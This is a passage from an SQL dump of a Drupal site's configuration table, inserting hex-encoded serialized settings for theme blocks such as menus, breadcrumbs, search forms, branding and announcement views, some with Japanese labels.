0x613a31333a7b733a343a2275756964223b733a33363a2262623236653166342d383734642d346532632d383235392d353636333437353063373263223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a363a22636f6e666967223b613a313a7b693a303b733a31393a2273797374656d2e6d656e752e6163636f756e74223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a373a226f6c697665726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22676d78595757486d67626530506e76387934385a4c534c48356d4548656a4f6a415036524c785566647a55223b7d733a323a226964223b733a32303a226f6c697665726f5f6163636f756e745f6d656e75223b733a353a227468656d65223b733a373a226f6c697665726f223b733a363a22726567696f6e223b733a31343a227365636f6e646172795f6d656e75223b733a363a22776569676874223b693a2d343b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a32353a2273797374656d5f6d656e755f626c6f636b3a6163636f756e74223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a32353a2273797374656d5f6d656e755f626c6f636b3a6163636f756e74223b733a353a226c6162656c223b733a31373a2255736572206163636f756e74206d656e75223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a363a2273797374656d223b733a353a226c6576656c223b693a313b733a353a226465707468223b693a313b733a31363a22657870616e645f616c6c5f6974656d73223b623a303b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.olivero_breadcrumbs', 0x613a31333a7b733a343a2275756964223b733a33363a2239333039326235382d653065322d343231652d386664362d316561386432393730303437223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a373a226f6c697665726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a225668427a5762376c4d5274494f673947375653775f30756f70692d377a5865487134765871715631484645223b7d733a323a226964223b733a31393a226f6c697665726f5f62726561646372756d6273223b733a353a227468656d65223b733a373a226f6c697665726f223b733a363a22726567696f6e223b733a31303a2262726561646372756d62223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a32333a2273797374656d5f62726561646372756d625f626c6f636b223b733a383a2273657474696e6773223b613a343a7b733a323a226964223b733a32333a2273797374656d5f62726561646372756d625f626c6f636b223b733a353a226c6162656c223b733a31313a2242726561646372756d6273223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a363a2273797374656d223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.olivero_content', 0x613a31333a7b733a343a2275756964223b733a33363a2233623531373031392d376632332d343234662d616336392d386361623639393431663862223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a373a226f6c697665726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2265725153455a463258556a4e6d67546c30754e52427a6d6731385a47587755637732466841706f6575486b223b7d733a323a226964223b733a31353a226f6c697665726f5f636f6e74656e74223b733a353a227468656d65223b733a373a226f6c697665726f223b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a31373a2273797374656d5f6d61696e5f626c6f636b223b733a383a2273657474696e6773223b613a343a7b733a323a226964223b733a31373a2273797374656d5f6d61696e5f626c6f636b223b733a353a226c6162656c223b733a31373a224d61696e207061676520636f6e74656e74223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a363a2273797374656d223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.olivero_help', 0x613a31333a7b733a343a2275756964223b733a33363a2263373061343866342d613061372d343166322d626164342d336533326631396364353532223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a2268656c70223b7d733a353a227468656d65223b613a313a7b693a303b733a373a226f6c697665726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2256665046717178666b6f6d756435434f384455696a77383551496c39474978685f6e49784c4f5945537867223b7d733a323a226964223b733a31323a226f6c697665726f5f68656c70223b733a353a227468656d65223b733a373a226f6c697665726f223b733a363a22726567696f6e223b733a31333a22636f6e74656e745f61626f7665223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a31303a2268656c705f626c6f636b223b733a383a2273657474696e6773223b613a343a7b733a323a226964223b733a31303a2268656c705f626c6f636b223b733a353a226c6162656c223b733a343a2248656c70223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a343a2268656c70223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.olivero_main_menu', 0x613a31333a7b733a343a2275756964223b733a33363a2231323662613634662d376332372d343135302d383264342d383862323261646631643730223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a2273797374656d2e6d656e752e6d61696e223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a373a226f6c697665726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224b5741697a694c333975457a6d4f4a45716c5f77625550325274714763654c33574d32436678684d656c45223b7d733a323a226964223b733a31373a226f6c697665726f5f6d61696e5f6d656e75223b733a353a227468656d65223b733a373a226f6c697665726f223b733a363a22726567696f6e223b733a31323a227072696d6172795f6d656e75223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a32323a2273797374656d5f6d656e755f626c6f636b3a6d61696e223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a32323a2273797374656d5f6d656e755f626c6f636b3a6d61696e223b733a353a226c6162656c223b733a31353a224d61696e206e617669676174696f6e223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a363a2273797374656d223b733a353a226c6576656c223b693a313b733a353a226465707468223b693a323b733a31363a22657870616e645f616c6c5f6974656d73223b623a313b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.olivero_messages', 0x613a31333a7b733a343a2275756964223b733a33363a2233366163666532302d636533322d346264622d623230632d396436653865623733336433223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a373a226f6c697665726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22425a357470573748385834505647526d334d496d5449486432744e306546377a4f74703453705259554130223b7d733a323a226964223b733a31363a226f6c697665726f5f6d65737361676573223b733a353a227468656d65223b733a373a226f6c697665726f223b733a363a22726567696f6e223b733a31313a22686967686c696768746564223b733a363a22776569676874223b693a2d353b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a32313a2273797374656d5f6d657373616765735f626c6f636b223b733a383a2273657474696e6773223b613a343a7b733a323a226964223b733a32313a2273797374656d5f6d657373616765735f626c6f636b223b733a353a226c6162656c223b733a31353a22537461747573206d65737361676573223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a363a2273797374656d223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.olivero_page_title', 0x613a31333a7b733a343a2275756964223b733a33363a2236373535316262652d336635372d343139632d393334342d363162376133313831643537223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a353a227468656d65223b613a313a7b693a303b733a373a226f6c697665726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2236614f6757734e54586a7172446d3938545853416a50367164326e43696a4431787734354d726e624b2d59223b7d733a323a226964223b733a31383a226f6c697665726f5f706167655f7469746c65223b733a353a227468656d65223b733a373a226f6c697665726f223b733a363a22726567696f6e223b733a31333a22636f6e74656e745f61626f7665223b733a363a22776569676874223b693a2d353b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a31363a22706167655f7469746c655f626c6f636b223b733a383a2273657474696e6773223b613a343a7b733a323a226964223b733a31363a22706167655f7469746c655f626c6f636b223b733a353a226c6162656c223b733a31303a2250616765207469746c65223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a343a22636f7265223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.olivero_powered', 0x613a31333a7b733a343a2275756964223b733a33363a2239646665643662652d313362662d346263632d386130352d336237396638613631373962223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a373a226f6c697665726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2265594c3139434c4479696e475457595166424431447377577a676c456f74455f6b486e487833417854584d223b7d733a323a226964223b733a31353a226f6c697665726f5f706f7765726564223b733a353a227468656d65223b733a373a226f6c697665726f223b733a363a22726567696f6e223b733a31333a22666f6f7465725f626f74746f6d223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a32333a2273797374656d5f706f77657265645f62795f626c6f636b223b733a383a2273657474696e6773223b613a343a7b733a323a226964223b733a32333a2273797374656d5f706f77657265645f62795f626c6f636b223b733a353a226c6162656c223b733a31373a22506f77657265642062792044727570616c223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a363a2273797374656d223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.olivero_primary_admin_actions', 0x613a31333a7b733a343a2275756964223b733a33363a2234306363636536612d333938382d346531652d616561392d343730643835383635666361223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a353a227468656d65223b613a313a7b693a303b733a373a226f6c697665726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2251395f327768644f6a3159496f6d66767349666f70524f573446545f5835705930446a644f694f61513555223b7d733a323a226964223b733a32393a226f6c697665726f5f7072696d6172795f61646d696e5f616374696f6e73223b733a353a227468656d65223b733a373a226f6c697665726f223b733a363a22726567696f6e223b733a31313a22686967686c696768746564223b733a363a22776569676874223b693a2d353b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a31393a226c6f63616c5f616374696f6e735f626c6f636b223b733a383a2273657474696e6773223b613a343a7b733a323a226964223b733a31393a226c6f63616c5f616374696f6e735f626c6f636b223b733a353a226c6162656c223b733a32313a225072696d6172792061646d696e20616374696f6e73223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a343a22636f7265223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.olivero_primary_local_tasks', 0x613a31333a7b733a343a2275756964223b733a33363a2238366566346562382d303462372d346438362d623539382d346162363562373035616365223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a353a227468656d65223b613a313a7b693a303b733a373a226f6c697665726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226e474533456f50515161514375715455745a6777302d4b497a6d7271644b447a644e5166324a7950557434223b7d733a323a226964223b733a32373a226f6c697665726f5f7072696d6172795f6c6f63616c5f7461736b73223b733a353a227468656d65223b733a373a226f6c697665726f223b733a363a22726567696f6e223b733a31313a22686967686c696768746564223b733a363a22776569676874223b693a2d343b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a31373a226c6f63616c5f7461736b735f626c6f636b223b733a383a2273657474696e6773223b613a363a7b733a323a226964223b733a31373a226c6f63616c5f7461736b735f626c6f636b223b733a353a226c6162656c223b733a31323a225072696d6172792074616273223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a343a22636f7265223b733a373a227072696d617279223b623a313b733a393a227365636f6e64617279223b623a303b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.olivero_search_form_narrow', 0x613a31333a7b733a343a2275756964223b733a33363a2264323038396535632d386237622d343934632d393939632d333934323137666266613766223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a363a22736561726368223b7d733a353a227468656d65223b613a313a7b693a303b733a373a226f6c697665726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22794542455430637144626b38646b577a614a772d38434b6674303936315642666c7349536f5352364c6a38223b7d733a323a226964223b733a32363a226f6c697665726f5f7365617263685f666f726d5f6e6172726f77223b733a353a227468656d65223b733a373a226f6c697665726f223b733a363a22726567696f6e223b733a31323a227072696d6172795f6d656e75223b733a363a22776569676874223b693a2d343b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a31373a227365617263685f666f726d5f626c6f636b223b733a383a2273657474696e6773223b613a353a7b733a323a226964223b733a31373a227365617263685f666f726d5f626c6f636b223b733a353a226c6162656c223b733a32303a2253656172636820666f726d20286e6172726f7729223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a363a22736561726368223b733a373a22706167655f6964223b733a303a22223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.olivero_search_form_wide', 0x613a31333a7b733a343a2275756964223b733a33363a2231396361353238302d323934362d346261322d383238342d666563666262306535643836223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a363a22736561726368223b7d733a353a227468656d65223b613a313a7b693a303b733a373a226f6c697665726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22696d4d794844364c596369306774587135367172395a4b47487a6245473975467964724e3545684b745355223b7d733a323a226964223b733a32343a226f6c697665726f5f7365617263685f666f726d5f77696465223b733a353a227468656d65223b733a373a226f6c697665726f223b733a363a22726567696f6e223b733a31343a227365636f6e646172795f6d656e75223b733a363a22776569676874223b693a2d353b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a31373a227365617263685f666f726d5f626c6f636b223b733a383a2273657474696e6773223b613a353a7b733a323a226964223b733a31373a227365617263685f666f726d5f626c6f636b223b733a353a226c6162656c223b733a31383a2253656172636820666f726d20287769646529223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a363a22736561726368223b733a373a22706167655f6964223b733a303a22223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.olivero_secondary_local_tasks', 0x613a31333a7b733a343a2275756964223b733a33363a2265653665323965322d656538372d343064382d616362352d613564656165643261653438223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a353a227468656d65223b613a313a7b693a303b733a373a226f6c697665726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22796453786471375236364938554d43343630724f7a6c667a766c554c34565262647763367a394457615549223b7d733a323a226964223b733a32393a226f6c697665726f5f7365636f6e646172795f6c6f63616c5f7461736b73223b733a353a227468656d65223b733a373a226f6c697665726f223b733a363a22726567696f6e223b733a31313a22686967686c696768746564223b733a363a22776569676874223b693a2d323b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a31373a226c6f63616c5f7461736b735f626c6f636b223b733a383a2273657474696e6773223b613a363a7b733a323a226964223b733a31373a226c6f63616c5f7461736b735f626c6f636b223b733a353a226c6162656c223b733a31343a225365636f6e646172792074616273223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a343a22636f7265223b733a373a227072696d617279223b623a303b733a393a227365636f6e64617279223b623a313b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.olivero_site_branding', 0x613a31333a7b733a343a2275756964223b733a33363a2262643061616461302d303837342d343030362d396464642d336439653937396566623139223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a373a226f6c697665726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226e5f6e6c676a6767485666517432485f5f7a764c4f4b423259746a50446251357448696a46394c4531614d223b7d733a323a226964223b733a32313a226f6c697665726f5f736974655f6272616e64696e67223b733a353a227468656d65223b733a373a226f6c697665726f223b733a363a22726567696f6e223b733a363a22686561646572223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a32313a2273797374656d5f6272616e64696e675f626c6f636b223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a32313a2273797374656d5f6272616e64696e675f626c6f636b223b733a353a226c6162656c223b733a31333a2253697465206272616e64696e67223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a363a2273797374656d223b733a31333a227573655f736974655f6c6f676f223b623a313b733a31333a227573655f736974655f6e616d65223b623a313b733a31353a227573655f736974655f736c6f67616e223b623a303b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.olivero_syndicate', 0x613a31333a7b733a343a2275756964223b733a33363a2237663962313362642d353330622d343462322d623064322d353165396161333439383861223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a226e6f6465223b7d733a353a227468656d65223b613a313a7b693a303b733a373a226f6c697665726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22306771335650672d5f554d36394643435775724c464972726e496a4332484c4b68776f3969514e7463556f223b7d733a323a226964223b733a31373a226f6c697665726f5f73796e646963617465223b733a353a227468656d65223b733a373a226f6c697665726f223b733a363a22726567696f6e223b733a363a22736f6369616c223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a32303a226e6f64655f73796e6469636174655f626c6f636b223b733a383a2273657474696e6773223b613a353a7b733a323a226964223b733a32303a226e6f64655f73796e6469636174655f626c6f636b223b733a353a226c6162656c223b733a383a225253532066656564223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a343a226e6f6465223b733a31313a22626c6f636b5f636f756e74223b693a31303b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.ourservices', 0x613a31323a7b733a343a2275756964223b733a33363a2231666564303936342d333263372d346635662d626232332d626535646136346230376638223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a373a22636f6e74656e74223b613a313a7b693a303b733a35363a22626c6f636b5f636f6e74656e743a62617369633a38663266383436352d663139362d343433612d613865372d623738393963633531353230223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a31313a226f75727365727669636573223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31383a2273756266656174757265735f7365636f6e64223b733a363a22776569676874223b693a2d31393b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a35303a22626c6f636b5f636f6e74656e743a38663266383436352d663139362d343433612d613865372d623738393963633531353230223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a35303a22626c6f636b5f636f6e74656e743a38663266383436352d663139362d343433612d613865372d623738393963633531353230223b733a353a226c6162656c223b733a31323a22e4ba8be6a5ade58685e5aeb9223b733a31333a226c6162656c5f646973706c6179223b733a373a2276697369626c65223b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a22737461747573223b623a313b733a343a22696e666f223b733a303a22223b733a393a22766965775f6d6f6465223b733a343a2266756c6c223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a373a223c66726f6e743e223b7d7d7d),
('', 'block.block.ourservicestitle', 0x613a31323a7b733a343a2275756964223b733a33363a2238323739373638642d616430332d346333312d383261612d626339333134646263633832223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a373a22636f6e74656e74223b613a313a7b693a303b733a35363a22626c6f636b5f636f6e74656e743a62617369633a62333031373461632d326334642d346166302d383335612d633633633737313936663035223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a31363a226f757273657276696365737469746c65223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31343a22636f6e74656e745f707265666978223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a35303a22626c6f636b5f636f6e74656e743a62333031373461632d326334642d346166302d383335612d633633633737313936663035223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a35303a22626c6f636b5f636f6e74656e743a62333031373461632d326334642d346166302d383335612d633633633737313936663035223b733a353a226c6162656c223b733a31383a224f7572205365727669636573207469746c65223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a22737461747573223b623a313b733a343a22696e666f223b733a303a22223b733a393a22766965775f6d6f6465223b733a343a2266756c6c223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a383a222f6e6f64652f3234223b7d7d7d);
INSERT INTO `config` (`collection`, `name`, `data`) VALUES
('', 'block.block.views_block__activity_block_1', 0x613a31323a7b733a343a2275756964223b733a33363a2235623864326137612d383661312d343137652d386633342d646263623834653134653932223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a363a22636f6e666967223b613a313a7b693a303b733a31393a2276696577732e766965772e6163746976697479223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a363a2273797374656d223b693a313b733a353a227669657773223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a32393a2276696577735f626c6f636b5f5f61637469766974795f626c6f636b5f31223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31353a2266656174757265735f7365636f6e64223b733a363a22776569676874223b693a2d393b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a32383a2276696577735f626c6f636b3a61637469766974792d626c6f636b5f31223b733a383a2273657474696e6773223b613a363a7b733a323a226964223b733a32383a2276696577735f626c6f636b3a61637469766974792d626c6f636b5f31223b733a353a226c6162656c223b733a363a22e6b4bbe58b95223b733a31333a226c6162656c5f646973706c6179223b733a373a2276697369626c65223b733a383a2270726f7669646572223b733a353a227669657773223b733a31313a2276696577735f6c6162656c223b733a363a22e6b4bbe58b95223b733a31343a226974656d735f7065725f70616765223b733a343a226e6f6e65223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a373a223c66726f6e743e223b7d7d7d),
('', 'block.block.views_block__announcement_block_1', 0x613a31323a7b733a343a2275756964223b733a33363a2263323064386161392d373637392d343034662d623538362d666532653532366238373761223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a363a22636f6e666967223b613a313a7b693a303b733a32333a2276696577732e766965772e616e6e6f756e63656d656e74223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a363a2273797374656d223b693a313b733a353a227669657773223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a33333a2276696577735f626c6f636b5f5f616e6e6f756e63656d656e745f626c6f636b5f31223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31343a2266656174757265735f6669727374223b733a363a22776569676874223b693a2d32313b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a33323a2276696577735f626c6f636b3a616e6e6f756e63656d656e742d626c6f636b5f31223b733a383a2273657474696e6773223b613a363a7b733a323a226964223b733a33323a2276696577735f626c6f636b3a616e6e6f756e63656d656e742d626c6f636b5f31223b733a353a226c6162656c223b733a31323a22e3818ae79fa5e38289e3819b223b733a31333a226c6162656c5f646973706c6179223b733a373a2276697369626c65223b733a383a2270726f7669646572223b733a353a227669657773223b733a31313a2276696577735f6c6162656c223b733a31323a22e3818ae79fa5e38289e3819b223b733a31343a226974656d735f7065725f70616765223b733a343a226e6f6e65223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a373a223c66726f6e743e223b7d7d7d),
('', 'block.block.views_block__related_blocks_block_1', 0x613a31323a7b733a343a2275756964223b733a33363a2233353061663164632d353861382d343666332d623036302d643030373865636662353630223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a363a22636f6e666967223b613a313a7b693a303b733a32353a2276696577732e766965772e72656c617465645f626c6f636b73223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a363a2273797374656d223b693a313b733a353a227669657773223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a33353a2276696577735f626c6f636b5f5f72656c617465645f626c6f636b735f626c6f636b5f31223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31343a22736964656261725f7365636f6e64223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a33343a2276696577735f626c6f636b3a72656c617465645f626c6f636b732d626c6f636b5f31223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a33343a2276696577735f626c6f636b3a72656c617465645f626c6f636b732d626c6f636b5f31223b733a353a226c6162656c223b733a303a22223b733a31333a226c6162656c5f646973706c6179223b733a373a2276697369626c65223b733a383a2270726f7669646572223b733a353a227669657773223b733a31353a22636f6e746578745f6d617070696e67223b613a303a7b7d733a31313a2276696577735f6c6162656c223b733a303a22223b733a31343a226974656d735f7065725f70616765223b733a343a226e6f6e65223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a31353a222f616e6e6f756e63656d656e742f2a223b7d7d7d),
('', 'block.block.views_block__related_blocks_block_2', 0x613a31323a7b733a343a2275756964223b733a33363a2235626631306631302d616161352d346632312d613465382d383836666235353234303966223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a363a22636f6e666967223b613a313a7b693a303b733a32353a2276696577732e766965772e72656c617465645f626c6f636b73223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a363a2273797374656d223b693a313b733a353a227669657773223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a33353a2276696577735f626c6f636b5f5f72656c617465645f626c6f636b735f626c6f636b5f32223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31343a22736964656261725f7365636f6e64223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a33343a2276696577735f626c6f636b3a72656c617465645f626c6f636b732d626c6f636b5f32223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a33343a2276696577735f626c6f636b3a72656c617465645f626c6f636b732d626c6f636b5f32223b733a353a226c6162656c223b733a303a22223b733a31333a226c6162656c5f646973706c6179223b733a373a2276697369626c65223b733a383a2270726f7669646572223b733a353a227669657773223b733a31353a22636f6e746578745f6d617070696e67223b613a303a7b7d733a31313a2276696577735f6c6162656c223b733a